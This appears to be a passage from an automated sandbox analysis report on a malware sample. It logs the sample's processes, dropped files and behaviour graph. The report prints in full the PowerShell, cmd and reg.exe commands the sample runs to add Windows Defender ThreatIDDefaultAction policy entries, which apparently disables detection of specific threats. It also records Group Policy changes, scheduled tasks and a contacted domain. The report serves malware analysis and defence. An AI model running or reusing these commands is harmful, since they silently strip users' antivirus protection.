Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414B04 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA, 0_2_00414B04

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Modifies Group Policy settings
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe File written: C:\Windows\System32\GroupPolicy\gpt.ini Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 753408 Sample: file.exe Startdate: 24/11/2022 Architecture: WINDOWS Score: 100 93 service-domain.xyz 2->93 95 clients2.google.com 2->95 97 clients.l.google.com 2->97 109 Multi AV Scanner detection for domain / URL 2->109 111 Antivirus detection for dropped file 2->111 113 Multi AV Scanner detection for dropped file 2->113 115 5 other signatures 2->115 12 file.exe 7 2->12         started        15 pdyDoIJ.exe 1 8 2->15         started        18 powershell.exe 12 2->18         started        20 gpscript.exe 2->20         started        signatures3 process4 file5 89 C:\Users\user\AppData\Local\...\Install.exe, PE32 12->89 dropped 22 Install.exe 4 12->22         started        91 C:\Windows\Temp\...\RFYnzaH.exe, PE32 15->91 dropped 123 Antivirus detection for dropped file 15->123 125 Multi AV Scanner detection for dropped file 15->125 127 Very long command line found 15->127 129 Uses cmd line tools excessively to alter registry or file data 15->129 26 powershell.exe 9 15->26         started        28 gpupdate.exe 1 18->28         started        30 conhost.exe 18->30         started        signatures6 process7 file8 87 C:\Users\user\AppData\Local\...\Install.exe, PE32 22->87 dropped 117 Multi AV Scanner detection for dropped file 22->117 32 Install.exe 10 22->32         started        119 Uses cmd line tools excessively to alter registry or file data 26->119 36 cmd.exe 26->36         started        38 conhost.exe 26->38         started        40 reg.exe 26->40         started        44 9 other processes 26->44 42 conhost.exe 28->42         started        signatures9 process10 file11 83 C:\Users\user\AppData\Local\...\pdyDoIJ.exe, PE32 32->83 dropped 85 C:\Windows\System32behaviorgraphroupPolicy\gpt.ini, ASCII 32->85 dropped 99 Antivirus detection for dropped file 32->99 101 Multi AV Scanner detection for dropped file 32->101 103 Uses schtasks.exe or at.exe to add and modify task schedules 32->103 105 Modifies Group Policy settings 32->105 46 forfiles.exe 1 32->46         started        48 forfiles.exe 1 32->48         started        50 schtasks.exe 2 32->50         started        54 3 other processes 32->54 107 Uses cmd line tools excessively to alter registry or file data 36->107 52 reg.exe 36->52         started        signatures12 process13 process14 56 cmd.exe 1 46->56         started        59 conhost.exe 46->59         started        61 cmd.exe 1 48->61         started        63 conhost.exe 48->63         started        65 conhost.exe 50->65         started        67 conhost.exe 54->67         started        69 conhost.exe 54->69         started        71 conhost.exe 54->71         started        signatures15 121 Uses cmd line tools excessively to alter registry or file data 56->121 73 reg.exe 1 1 56->73         started        75 reg.exe 1 56->75         started        77 reg.exe 1 1 61->77         started        79 reg.exe 1 61->79         started        process16 process17 81 Conhost.exe 73->81         started       
No contacted IP infos

Contacted Domains

Name IP Active
service-domain.xyz 3.80.150.121 true
clients.l.google.com 142.250.203.110 true
clients2.google.com unknown unknown